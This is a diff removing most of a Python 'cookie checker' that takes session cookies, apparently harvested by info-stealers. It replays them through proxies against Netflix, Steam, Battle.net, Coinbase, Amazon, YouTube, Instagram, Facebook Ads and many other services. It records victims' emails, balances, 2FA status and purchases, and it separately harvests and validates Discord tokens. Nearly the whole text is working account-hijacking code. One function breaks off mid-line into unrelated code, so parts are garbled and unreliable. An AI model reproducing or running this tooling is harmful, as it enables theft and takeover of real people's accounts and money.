self.check_twitterads(all_cooks[i], settings) - except: - pass - if settings['services']['WALMART'] == 2: - try: - self.check_walmart(all_cooks[i], settings) - except: - pass - if settings['services']['UBEREATS'] == 2: - try: - self.check_ubereats(all_cooks[i], settings) - except: - pass - if settings['services']['ZILLOW'] == 2: - try: - self.check_zillow(all_cooks[i], settings) - except: - pass - if settings['services']['FLIPKART'] == 2: - try: - self.check_flipkart(all_cooks[i], settings) - except: - pass - if settings['services']['DHGATE'] == 2: - try: - self.check_dhgate(all_cooks[i], settings) - except: - pass - if settings['services']['INSTACART'] == 2: - try: - self.check_instacart(all_cooks[i], settings) - except: - pass - if settings['services']['ASHLEYMADISON'] == 2: - try: - self.check_ashleymadison(all_cooks[i], settings) - except: - pass - if settings['services']['ZOOSK'] == 2: - try: - self.check_zoosk(all_cooks[i], settings) - except: - pass - if settings['services']['CHRISTANMINGLE'] == 2: - try: - self.check_christanmingle(all_cooks[i], settings) - except: - pass - if settings['services']['VINTED'] == 2: - try: - self.check_vinted(all_cooks[i], settings) - except: - pass - if settings['services']['BOOKING'] == 2: - try: - self.check_booking(all_cooks[i], settings) - except: - pass - if settings['services']['ZOOSK'] == 2: - try: - self.check_zoosk(all_cooks[i], settings) - except: - pass - if settings['services']['TEMU'] == 2: - try: - self.check_temu(all_cooks[i], settings) - except: - pass - if settings['services']['KICK'] == 2: - try: - self.check_kick(all_cooks[i], settings) - except: - pass - if settings['services']['MYSPACE'] == 2: - try: - self.check_myspace(all_cooks[i], settings) - except: - pass - if settings['services']['SNAPCHAT'] == 2: - try: - self.check_snapchat(all_cooks[i], settings) - except: - pass - if settings['services']['TWITCH'] == 2: - try: - self.check_twitch(all_cooks[i], settings) - except: - pass - if settings['services']['LOCALS'] == 2: - try: - self.check_locals(all_cooks[i], settings) - except: - pass - if settings['services']['LINKEDIN'] == 2: - try: - self.check_linkedin(all_cooks[i], settings) - except: - pass - checked += 1 - self.info_progress.emit(checked) - except Exception as err: - checked += 1 - self.info_progress.emit(checked) - - continue - - - - def conn(self, obj, url, cookies, settings, headers, params=None, json=None, data=None): - connection_counter = 0 - if settings['settings']['PROXY'] != "off": - while True: - connection_counter += 1 - if connection_counter >= 15: - return None - proxy = self.get_random_proxy(settings) - if settings["settings"]["USERAGENT"] == 2: - headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'user-agent': random.choice(useragents)} - headers = dict(list(headers.items()) + list(headers_useragent.items())) - - - else: - headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', - 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'} - headers = dict(list(headers.items()) + list(headers_useragent.items())) - - try: - r = obj(url=url, headers=headers, params=params, data=data, cookies=cookies, proxies=proxy, json=json,timeout=5) - if r.status_code == 404: - return r - if r.status_code == 200: - return r - except Exception as e: - try: - continue - finally: - e = None - del e - else: - if settings["settings"]["USERAGENT"] == 2: - headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'user-agent': random.choice(useragents)} - headers = dict(list(headers.items()) + list(headers_useragent.items())) - else: - headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', - 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'} - headers = dict(list(headers.items()) + list(headers_useragent.items())) - - r = obj(url=url, headers=headers, params=params, data=data, cookies=cookies) - return r - - def check_netflix(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'netflix') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url="https://www.netflix.com/YourAccount", cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - plan = soup.find('div', attrs={'data-uia': "plan-label"}).find('b').text - - email = soup.find('div', attrs={'class': 'account-section-item account-section-email'}).text - self.save_results('Netflix', 'netflix.txt', f'email - {email} || Plan - {plan}\nCookie:{cookie_name}') - if settings['settings']['save_netflix_logs'] == 1: - self.save_logs('Netflix', cookie_name, f'email - {email} || Plan - {plan}\nCookie:{cookie_name}') - self.console_add_text.emit(f'Netflix\nemail - {email} || Plan - {plan}\nCookie:{cookie_name}') - except Exception as err: - self.console_add_text.emit(self.err) - pass - - def check_roblox(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'roblox') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://www.roblox.com/home', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - id = soup.find('meta', attrs={'name': "user-data"}).get('data-userid') - r = self.conn(obj=session.get, url=f'https://economy.roblox.com/v1/users/{id}/currency', cookies=cookie, settings=settings, headers={}) - robux = r.json()['robux'] - self.console_add_text.emit(f'ROBUX: {robux} || Cookie:{cookie_name}') - self.save_results('Roblox', 'roblox.txt', f'ROBUX: {robux} || Cookie:{cookie_name}') - if settings['settings']['save_roblox_logs'] == 1: - self.save_logs('Roblox', cookie_name, f'ROBUX: {robux} || Cookie:{cookie_name}') - except: - pass - - def check_facebook(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'facebook') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url="https://www.facebook.com/settings", cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - name = soup.find('span', attrs={'class': "_1vp5"}).text - self.console_add_text.emit('Facebook valid session!') - print('Facebook valid session!') - self.save_results('Facebook', 'Facebook.txt', f'Valid session facebook:{cookie_name}') - if settings['settings']['save_facebook_logs'] == 1: - self.save_logs('Facebook', cookie_name, f'Valid session facebook:{cookie_name}') - self.check_facebook_ads(cookie_name, settings) - except Exception as err: - print(err) - pass - - def check_facebook_ads(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'facebook') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - session.max_redirects = 500 - text = '' - folder_name = '' - account_status = {1: 'ACTIVE', - 2: 'DISABLED', - 3: 'UNSETTLED', - 7: 'PENDING_RISK_REVIEW', - 8: 'PENDING_SETTLEMENT', - 9: 'IN_GRACE_PERIOD', - 100: 'PENDING_CLOSURE', - 101: 'CLOSED', - 201: 'ANY_ACTIVE', - 202: 'ANY_CLOSED'} - r = self.conn(obj=session.get, url="https://www.facebook.com/adsmanager/manage/campaigns?", cookies=cookie, settings=settings, headers={}) - comp_id = r.text.split("campaigns?act=")[1] - print("XYI FB") - comp_id = comp_id.split('")')[0] - - r = self.conn(obj=session.get, url=f'https://www.facebook.com/adsmanager/manage/campaigns?act={comp_id}', cookies=cookie, settings=settings, headers={}) - token = r.text.split('')[0] - data = json.loads(html) - profile_url = f"https://www.instagram.com/{data['config']['viewer']['username']}" - number_verif = data['config']['viewer']['has_phone_number'] - r = self.conn(obj=session.get, url=profile_url, cookies=cookie, settings=settings, headers={}) - html = r.text.split('window._sharedData = ')[1] - html = html.split(';')[0] - data = json.loads(html) - subs_count = data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_followed_by']['count'] - follow = data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_follow']['count'] - self.console_add_text.emit( - f'Instagram\nPROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - {subs_count}\n FOLOLOW - {follow}\nCookie:{cookie_name}\n\n{"=" * 30}\n') - if not os.path.exists('Instagram'): - os.mkdir('Instagram') - if settings['cookies']['instagram'] == 1: - self.save_cookies('Instagram_cookies', cookie_name) - if int(subs_count) > int(settings['save_filters']['inst_min_subs']): - path_to_save = f"Instagram\\Instagram_{settings['save_filters']['inst_min_subs']}" - self.save_results(path_to_save, 'Instagram.txt', - f'PROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - {subs_count}\nCookie:{cookie_name}\n{"=" * 30}') - else: - path_to_save = 'Instagram' - self.save_results(path_to_save, 'Instagram.txt', - f'PROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - {subs_count}\nCookie:{cookie_name}\n{"=" * 30}') - if settings['settings']['save_instagram_logs'] == 1: - self.save_logs(path_to_save, cookie_name, - f'PROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - {subs_count}\nCookie:{cookie_name}\n{"=" * 30}') - - except Exception as err: - pass - - def check_battlenet(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'battle') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url=url_settings['services']['battlenet'], cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - auth = soup.find('div', attrs={'class': "Navbar-label Navbar-accountAuthenticated"}).text - self.save_results('BattleNet', 'BattleNet.txt', f'valid Cookie:{cookie_name}') - if settings['settings']['save_battlenet_logs'] == 1: - self.save_logs('BattleNet', cookie_name, f'valid Cookie:{cookie_name}') - except Exception as err: - pass - - def check_battlenet_games(self, cookie_name, settings): - global url_settings - try: - cookie = self.net_to_cookie(cookie_name, 'battle') - except: - cookie = {} - if len(cookie) > 1: - try: - if not os.path.exists('Battlenet_full'): - os.mkdir('Battlenet_full') - if not os.path.exists('Battlenet_full\\WithPurchases'): - os.mkdir('Battlenet_full\\WithPurchases') - session = requests.Session() - r = self.conn(obj=session.get, url='https://account.blizzard.com/oauth2/authorization/account-settings?ref=/transactions', cookies=cookie, settings=settings, headers={}) - r = self.conn(obj=session.get, url='https://eu.battle.net/oauth/authorize?response_type=code&client_id=057adb2af62a4d59904f74754838c4c8&scope=account.full commerce.virtualcurrency.full commerce.virtualcurrency.basic&state=eyJzdGF0ZUVudHJvcHkiOiJLUkJXVXdkWk5zRjM2VG1OT3RTQjhodWJxSDJCN3BCWlRWYzM4OEk5LWM4PSIsInJlZmVycmVyIjoiL3RyYW5zYWN0aW9ucyJ9&redirect_uri=https://account.blizzard.com/login/oauth2/code/account-settings®istration_id=account-settings', cookies=cookie, settings=settings, headers={}) - r = self.conn(obj=session.get, url='https://account.blizzard.com/api/transactions?regionId=2', cookies=cookie, settings=settings, headers={}) - data = r.json() - r = self.conn(obj=session.get, url='https://account.blizzard.com/api/overview', cookies=cookie, settings=settings, headers={}) - account_info = r.json() - isAuth = account_info['accountSecurityStatus']['authenticatorAttached'] - isSMSprotect = account_info['accountSecurityStatus']['smsProtectAttached'] - email = account_info['accountDetails']['email'] - text = 'Purchases:\n' - for i in data['purchases']: - text += f"{i['productTitle']} == {i['formattedTotal']}\n" - text += '\nGifts:\n' - for i in data['giftClaims']: - text += f'{i["productTitle"]}\n' - if len(data['purchases']) >= 1 or len(data['giftClaims']) >= 1: - path_to_save = 'Battlenet_full\\WithPurchases' - else: - path_to_save = 'Battlenet_full' - self.console_add_text.emit( - f'Battlenet\n{text}\nAuth - {isAuth}\nSMSprotect - {isSMSprotect}\nemail - {email}\nCookie:{cookie_name}\n{"=" * 50}\n') - self.save_results(path_to_save, 'Battlenet_full.txt', - f'{text}\nAuth - {isAuth}\nSMSprotect - {isSMSprotect}\nemail - {email}\nCookie:{cookie_name}\n{"=" * 50}\n') - if settings['settings']['save_battlenet_logs'] == 1: - self.save_logs(path_to_save, cookie_name, - f'{text}\nAuth - {isAuth}\nSMSprotect - {isSMSprotect}\nemail - {email}\nCookie:{cookie_name}\n{"=" * 50}\n') - except Exception as err: - pass - - def check_steam(self, cookie_name, settings): - global url_settings - try: - cookie = self.net_to_cookie(cookie_name, 'steam') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://store.steampowered.com/account/', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - inv_url = soup.find_all('a', attrs={'class': 'submenuitem'})[17].get('href') - profile_url = soup.find('a', attrs={'class': 'user_avatar playerAvatar offline'}).get('href') - try: - balance = soup.find('div', attrs={'class': 'accountData price'}).text - except Exception as err: - balance = 'None' - - try: - guard = soup.find('div', attrs={'class': 'account_security_block'}).find_next('div', attrs={ - 'class': 'account_data_field'}).text.replace(' ', '').replace('\n', - '') - guard = u'{0}'.format(guard) - except Exception as err: - guard = 'Information could not be obtained' - - try: - mail = soup.find_all('div', attrs={'class': 'account_setting_sub_block'})[3].find_next('span', - attrs={ - 'class': 'account_data_field'}).text - except Exception as err: - mail = '?' - - r = self.conn(obj=session.get, url=inv_url, cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - try: - items_all = soup.find('div', attrs={'class': 'games_list_tabs'}) - games = items_all.find_all_next('span', attrs={'class': 'games_list_tab_name'}) - items_count = items_all.find_all_next('span', attrs={'class': 'games_list_tab_number'}) - inventory_text = '' - for i in range(len(games)): - inventory_text += f'{games[i].text}: {items_count[i].text}\n' - except Exception as err: - items_all = 0 - games = 0 - items_count = 0 - inventory_text = 'Failed to load inventory info' - try: - r = self.conn(obj=session.get, url=f'https://csgobackpack.net/?nick={profile_url}', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - price = soup.find('div', attrs={'class': 'well'}).find_next('p').text - except: - price = '???' - try: - r = self.conn(obj=session.get, url='https://ruststash.com/inventory/{profile_url.split("/")[3]}', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - price_rust = soup.find('div', attrs={'class': 'well'}).find_next('p').text - except: - price_rust = '???' - self.console_add_text.emit( - f'Steam\nPROFILE URL - {profile_url} || BALANCE - {balance}\n\nINVENTORY:\n{inventory_text}\nInventory price\nCS:GO:{price}\nRust:{price_rust}\nMail:{mail}\nGuard:{guard}\nCookie:{cookie_name}\n{"=" * 30}') - self.save_results('Steam', 'Steam.txt', - f'PROFILE URL - {profile_url} || BALANCE - {balance}\n\nINVENTORY:\n{inventory_text}\nInventory price\nCS:GO:{price}\nRust:{price_rust}\nMail:{mail}\nGuard:{guard}\nCookie:{cookie_name}\n{"=" * 30}') - if settings['settings']['save_steam_logs'] == 1: - self.save_logs('Steam', cookie_name, - f'PROFILE URL - {profile_url} || BALANCE - {balance}\n\nINVENTORY:\n{inventory_text}\nMail:{mail}\nCS:GO inventory price:{price}\nGuard:{guard}\nCookie:{cookie_name}') - except Exception as err: -# print(err) - pass - - def check_youtube(self, cookie_name, settings): - youtbe_part_one = "['id-0'].resolve(" - try: - cookie = self.net_to_cookie(cookie_name, 'youtube') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://studio.youtube.com/channel/?approve_browser_access=1', cookies=cookie, settings=settings, headers={}) - if '
' not in r.text: - html = r.text.split(youtbe_part_one)[1] - html = html.split(');')[0] - data = json.loads(html) - url = f"https://www.youtube.com/channel/{data['channelId']}" - subscribers = data['metric'][f"subscriberCount"] - totalVideoViewCount = data['metric']['totalVideoViewCount'] - isNameVerified = data['isNameVerified'] - isMonetized = data['isMonetized'] - channel_name = data['title'] - if settings['filters']['youtube_min_subs'] <= int(subscribers) <= settings['filters'][ - 'youtube_max_subs']: - self.console_add_text.emit( - f"Channel URL - {url}\nChannel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}\n{'=' * 30}") - now = DT.datetime.now(DT.timezone.utc).astimezone() - time_format = '%H:%M:%S' - if not os.path.exists('Youtube'): - os.mkdir('Youtube') - else: - if int(subscribers) >= int(settings['save_filters']['yt_min_subs']): - if isMonetized == True: - path_to_save = 'Youtube\\Monetized' - else: - path_to_save = f"Youtube\\Youtube_{settings['save_filters']['yt_min_subs']}+" - self.save_results(path_to_save, - f"{subscribers}подписчиков_{now:{time_format.replace(':', '-')}}.txt", - f"Channel URL - {url}\n Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") - self.save_logs(path_to_save, cookie_name, - f"Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") - else: - path_to_save = 'Youtube' - if isMonetized == True: - path_to_save = 'Youtube\\Monetized' - else: - path_to_save = 'Youtube' - self.save_results(path_to_save, - f"{subscribers}subscribers_{now:{time_format.replace(':', '-')}}.txt", - f"Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") - if settings['settings']['save_yt_logs'] == 1: - self.save_logs(path_to_save, cookie_name, - f"Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") - if settings['settings']['save_yt_cookies'] == 1: - self.save_cookies_yt('YT_Cookies', cookie_name, channel_name, subscribers) - else: - self.console_add_text.emit('Found YT cookie without channel') - self.save_cookies_yt('Yt_Cookies_NoChannel', cookie_name, 'No channel', '-') - except Exception as err: - try: - pass - finally: - err = None - del err - - def check_kryptex(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'kryptex') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://www.kryptex.org/site/dashboard', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - balance = soup.find('h3', attrs={'class': 'h1 line-normal mb-0'}).text - self.console_add_text.emit(f"Kryptex account: Total balance: {balance}") - text_to_insert = f"Total balance: {balance}\nCookie:{cookie_name}" - self.save_results('Kryptex', f"{balance}_{random.randint(1, 100000)}.txt", text_to_insert) - if settings['settings']['save_kryptex_logs'] == 1: - self.save_logs('Kryptex', cookie_name, text_to_insert) - except Exception as err: - try: - pass - finally: - self.err = None - del self.err - - def check_tiktok(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'tiktok') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://www.tiktok.com/404?fromUrl=/me', cookies=cookie, settings=settings, headers={}) - id = r.text.split('"uniqueId":"')[1].split('"')[0] - r = self.conn(obj=session.get, url=f"https://www.tiktok.com/@{id}", cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - following = soup.find('strong', attrs={'data-e2e': 'following-count'}).text - followers = soup.find('strong', attrs={'data-e2e': 'followers-count'}).text - likes = soup.find('strong', attrs={'data-e2e': 'likes-count'}).text - if int(followers) > int(settings['save_filters']['tiktok_min_subs']): - path_to_save = f"TikTok\\TikTok_{settings['save_filters']['tiktok_min_subs']}+" - self.save_results(path_to_save, 'TikTok.txt', - f"Followers:{followers}\nLikes:{likes}\nCookie:{cookie_name}\n") - else: - path_to_save = 'TikTok' - self.save_results('TikTok', f"{followers} followers_{id}.txt", - f"Followers:{followers}\nLikes:{likes}\nCookie:{cookie_name}\n") - if settings['settings']['save_tiktok_logs'] == 1: - self.save_logs(path_to_save, cookie_name, - f"Followers:{followers}\nLikes:{likes}\nCookie:{cookie_name}\n") - except Exception as err: - try: - pass - finally: - self.err = None - del self.err - - def check_pathofexile(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'pathofexile') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - characters = '' - r = self.conn(obj=session.get, url='https://ru.pathofexile.com/character-window/get-characters', cookies=cookie, settings=settings, headers={}) - data = r.json() - for i in data: - characters += f"{i['name']} | league:{i['league']} | level:{i['level']}\n" - - r = self.conn(obj=session.get, url='https://ru.pathofexile.com/my-account', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - money = soup.find('span', attrs={'class': 'amount shopCurrentCoinValue account'}).text - account_name = r.text.split('var a = new A({"name":"')[1].split('"')[0] - r = self.conn(obj=session.get, url=f"https://ru.pathofexile.com/character-window/get-stash-items?accountName={account_name}&realm=pc&league=Heist&tabs=1&tabIndex=0", cookies=cookie, settings=settings, headers={}) - tabs_count = r.json()['numTabs'] - self.console_add_text.emit('Path Of Exile account!') - text_to_insert = f"{'=============================='}\n\nBalance: {money}\nThe number of tabs in the inventory: {tabs_count}\nCharacters:\n{characters}\nCookie:{cookie_name}\n{'=============================='}\n\n" - self.save_results('PathOfExile', 'Poe_info.txt', text_to_insert) - if settings['settings']['save_pathofexile_logs'] == 1: - self.save_logs('PathOfExile', cookie_name, - f"{'=============================='}\n\nBalance: {money}\nThe number of tabs in the inventory: {tabs_count}\nCharacters:\n{characters}\nCookie:{cookie_name}\n{'=============================='}\n\n") - except: - pass - - def check_hitbtc(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'hitbtc') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - header = {'x-csrf-token': cookie['csrf']} - r = self.conn(obj=session.get, url='https://hitbtc.com/sub-accounts/transfer-emails-list', cookies=cookie, settings=settings, headers={}) - data = r.json() - email = data['data'][0]['email'] - self.save_results('HitBTC', 'HitBTC.txt', f"Valid session with mail {email}\nCookie:{cookie_name}\n") - if settings['settings']['save_hitbtc_logs'] == 1: - self.save_logs('HitBTC', cookie_name, f"Valid session with mail {email}\nCookie:{cookie_name}\n") - self.console_add_text.emit('found HIT BTC!') - except: - pass - - def check_amazon(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'amazon') - except: - cookie = {} - if len(cookie) > 1: - try: - domains = ["ca", "com.br", "com", "de", "sg", "ae", "com.tr", "in", "com.au", "co.uk", "cn", "fr", "it", - "co.jp", "pl", "es", "nl"] - for domain in domains: - session = requests.Session() - r = self.conn(obj=session.get, url=f'https://www.amazon.{domain}/ref=nav_logo', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - pattern = re.compile(r"'config.customerName','(.*?)'\);", re.MULTILINE | re.DOTALL) - script = soup.find("script", text=pattern) - if script != None: - account_name = pattern.search(script.text).group(1) - account_address = soup.find('span', attrs={'class': 'nav-line-2 nav-progressive-content'}).text - try: - account_date = soup.find('p', attrs={'class': 'a-size-base truncate-1line'}).text - except: - account_date = "NONE" - self.console_add_text.emit(account_address) - self.save_results('Amazon', 'Amazon.txt', - f'Domain: {r.url}\nCookie: {cookie_name}\nAccount name: {account_name}\nAccount address: {account_address}Account date create: {account_date}\n{"=" * 100}\n') - if settings['settings']['save_amazon_logs'] == 1: - shutil.copytree(self.get_path(cookie_name), - "Amazon"+"\\"+domain+"\\"+self.get_path(cookie_name).split("\\")[1]) - self.save_results("Amazon"+"\\"+domain+"\\"+self.get_path(cookie_name).split("\\")[1], 'Amazon_checked_info.txt', f'Domain: https://www.amazon.{domain}\nCookie: {cookie_name}\nAccount name: {account_name}\nAccount address: {account_address}Account date create: {account_date}\n{"=" * 100}\n') - else: - script = 'poshel nahyi oshibka ebanaya ebalo y tebya none' - except: - pass - - def check_coinbase(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'coinbase') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://www.coinbase.com/api/v2/hold-balances', cookies=cookie, settings=settings, headers={}) - data = json.loads(r.text) - balance = f"{data['data']['total_portfolio_balance']['amount']}{data['data']['total_portfolio_balance']['currency']}" - self.save_results('Coinbase', 'Coinbase.txt', f'Balance: {balance}\nCookie:{cookie_name}') - if settings['settings']['save_coinbase_logs'] == 1: - shutil.copytree(self.self.get_path(cookie_name), - f'Coinbase\\{self.get_path(cookie_name).replace("data", "")}') - self.save_results(f'Coinbase\\{self.get_path(cookie_name).replace("data", "")}', - 'Coinbase_checked_info.txt', - f'Balance: {balance}\nCookie:{cookie_name}') - except Exception as err: - pass - - def check_humble(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'humblebundle') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://www.humblebundle.com/user/wallet?hmb_source=navbar', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - balance = soup.find('div', attrs={'class': 'balance'}).text - self.save_results('Humble', 'Humblebundle.txt', f'Cookie:{cookie_name}{balance}{"=" * 40}') - if settings['settings']['save_humble_logs'] == 1: - shutil.copytree(self.get_path(cookie_name), - f'Humble\\{self.get_path(cookie_name).replace("data", "")}') - self.save_results(f'Humble\\{self.get_path(cookie_name).replace("data", "")}', - 'Humble_checked_info.txt', - f'Cookie:{cookie_name}{balance}') - except: - pass - - def check_free_bitcoin(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'freebitco.in') - except: - cookie = {} - if len(cookie) > 1: - try: - session = requests.Session() - r = self.conn(obj=session.get, url='https://freebitco.in/', cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - balance = soup.find('span', attrs={'id': 'balance'}).text - self.console_add_text.emit(f'Balance: {balance} BTC \nCookie:{cookie_name}') - if not os.path.exists('Freebtc'): - os.mkdir('Freebtc') - if float(balance) > float(settings['save_filters']['freebtc_min_balance']): - path_to_save = f"Freebtc\\Freebtc_{settings['save_filters']['freebtc_min_balance']}+" - self.save_results(path_to_save, 'freebitcoin.txt', f'Balance: {balance}\nCookie:{cookie_name}') - else: - path_to_save = 'Freebtc' - self.save_results(path_to_save, 'freebitcoin.txt', f'Balance: {balance}\nCookie:{cookie_name}') - if settings['settings']['save_freebtc_logs'] == 1: - self.save_logs(path_to_save, cookie_name, 'Balance: {balance}\nCookie:{cookie_name}') - except: - pass - - def get_vk_token(self, cookie, settings): - try: - session = requests.Session() - url = 'https://oauth.vk.com/authorize?client_id=6121396&scope=501202911&redirect_uri=https://oauth.vk.com/blank.html&display=page&response_type=token&revoke=1' - r = self.conn(obj=session.get, url=url, cookies=cookie, settings=settings, headers={}) - soup = bs(r.text, 'html.parser') - pattern = re.compile(r'location.href = "(.*?)"\+addr;', re.MULTILINE | re.DOTALL) - script = soup.find("script", text=pattern) - link = pattern.search(script.text).group(1) - r = self.conn(obj=session.get, url=link, cookies=cookie, settings=settings, headers={}) - soups = bs(r.text, 'html.parser') - pattern = re.compile(r"location.href='(.*?)';", re.MULTILINE | re.DOTALL) - script = soups.find("script", text=pattern) - access_token = pattern.search(script.text).group(1) - token = access_token.split('token=')[1] - token = token.split('&')[0] - self.save_results(folder_name='VK_tokens', file_name='tokens.txt', text_to_insert=f'{token}') - except Exception as err: -# self.console_add_text.emit("Mistake vk_token:" + self.err) - pass - - def get_user_info(self, token, settings): - try: - idlist = [] - session = requests.Session() - url = "https://discordapp.com/api/v7/users/@me?verified" - headers = {"authorization": token} - r = self.conn(obj=session.get, url=url, cookies=None, settings=settings, headers=headers) - if r.status_code == 200: - json_response = r.json() - if json_response["id"] not in idlist: - idlist.append(json_response["id"]) - if json_response["verified"] == True: - return True - else: - return False - else: - return "sameToken" - else: - return None - except Exception as err: - print(err) - # self.console_add_text.emit("Mistake vk_token:" + self.err) - pass - - def get_plan_id(self, token, settings): - try: - session = requests.Session() - for json in self.conn(obj=session.get, url="https://discord.com/api/v7/users/@me/billing/subscriptions", cookies=None, settings=settings, headers={"authorization": token}).json(): - try: - if json["plan_id"] == "511651880837840896": - return True - else: - return False - except: - return None - except Exception as err: - print(err) - # self.console_add_text.emit("Mistake vk_token:" + self.err) - pass - - def get_payment_id(self, token, settings): - try: - session = requests.Session() - for json in self.conn(obj=session.get, url="https://discordapp.com/api/v7/users/@me/billing/payment-sources", cookies=None, settings=settings, headers={"authorization": token}).json(): - try: - if json["invalid"] == True: - return True - else: - return False - except: - return None - except Exception as err: - print(err) - # self.console_add_text.emit("Mistake vk_token:" + self.err) - pass - - def check_discord(self, cookie_name, settings): - try: - if not os.path.exists("Discord"): - os.makedirs("Discord") - - dirValidTokens = f"Discord/valid.txt" - dirUnverifiedTokens = f"Discord/unverified.txt" - dirSameTokens = f"Discord/sameTokens.txt" - dirInvalidTokens = f"Discord/invalid.txt" - dirNitroTokens = f"Discord/nitro.txt" - tokens = [] - - for line in [x.strip() for x in open(f"{cookie_name}", errors="ignore").readlines() if - x.strip()]: # cookie_name this is a file that it devours and runs for tokens - for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"): - for token in re.findall(regex, line): - tokens.append(token) - - tokens = list(dict.fromkeys(tokens)) - for token in tokens: - user_info = self.get_user_info(token, settings) - if user_info == "sameToken": - with open(dirSameTokens, "a", encoding="utf-8") as f: - f.write(token + "\n") - - else: - if user_info == None: - with open(dirInvalidTokens, "a", encoding="utf-8") as f: - f.write(token + "\n") - elif user_info == True: - with open(dirValidTokens, "a", encoding="utf-8") as f: - f.write(token + "\n") - planid = self.get_plan_id(token, settings) - payid = self.get_payment_id(token, settings) - if planid != None or payid != None: - with open(dirNitroTokens, "a", encoding="utf-8") as f: - f.write(token + "\n") - self.console_add_text.emit(f"{token} | Nitro") - else: - self.console_add_text.emit(f"{token} | Valid") - else: - with open(dirUnverifiedTokens, "a", encoding="utf-8") as f: - f.write(token + "\n") - self.console_add_text.emit(f"{token} | Unverified") - except Exception as err: - print(err) - # self.console_add_text.emit("Mistake vk_token:" + self.err) - pass - - def check_genshin(self, cookie_name, settings): - try: - cookie = self.net_to_cookie(cookie_name, 'mihoyo') - except: - cookie = {} - if len(cookie) > 1: - try: - r = self.conn(requests.post, url='https://api-os-takumi.mihoyo.com/community/user/wapi/userInfoEdit', settings=settings, headers={}, cookies=cookie, data='{"avatar":"100108","avatar_url":"","gender":0,"introduce":""}') - jj = r.json()['message'] - if jj == 'OK': 